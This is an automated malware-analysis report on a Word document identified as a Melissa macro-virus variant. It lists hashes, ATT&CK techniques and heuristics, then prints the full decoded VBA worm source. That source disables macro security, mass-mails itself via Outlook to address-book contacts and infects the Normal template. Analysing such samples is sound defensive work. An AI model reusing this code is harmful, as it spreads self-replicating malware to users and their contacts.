Melissa — Office (OLE) malware analysis

Static analysis result for SHA-256 ee8ca9ff9dce50f8…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 32.0 KB
Created: 1999-04-02 18:37:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-30
MD5: 86b8f1c309b6afbcc707431bf61b0cd0
SHA-1: f6f9f73209c7543b339cc72ca34ac47afefb15ec
SHA-256: ee8ca9ff9dce50f83374fa984e9048b81e54c337dc337c3a3d5d4d99e368ac59
Risk score: 336

Malware Insights

Melissa · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1041 Exfiltration Over C2 Channel
  • T1071.001 Web Protocols

The sample contains VBA macros that are designed to replicate and spread via email using Outlook. The AutoOpen macro attempts to disable security settings and then harvests email addresses from the MAPI address book to send itself as an attachment. This behavior is characteristic of the Melissa virus.

Heuristics (8)

  • ClamAV: Win.Trojan.Psycho-3 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
    ADI1.CodeModule.DeleteLines 1, ADCL
  • VBA email-worm self-replication (Outlook mass-mailer) (critical) OLE_VBA_EMAIL_WORM_SELF_REPLICATION
    VBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, harvests recipients from the MAPI address book or inbox, attaches a file to the outgoing message and sends the message programmatically. Harvesting recipients from the address book or inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage; it has no benign document use, independent of any AV signature.
    Matched line in script:
    Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
    Set UngaDasOutlook = CreateObject("Outlook.Application")
  • AutoOpen macro (low) OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Private Sub AutoOpen()
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13135 bytes
SHA-256: 99aa9f83c4e163b1cd5b91731b58d1ce2a26af23d75cdd1c0809c61db1082689
Detection: ClamAV: Doc.Trojan.Melissa-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Важное сообщение от " & Application.UserName
         BreakUmOffASlice.Body = "Посылаю тебе то, что ты просил... Специально для тебя ! ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Я слишком шустрый для тебя !!! "
End Sub

' Processing file: /opt/analyzer/scan_staging/d576974eebf841ba86787043e50864e3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 6717 bytes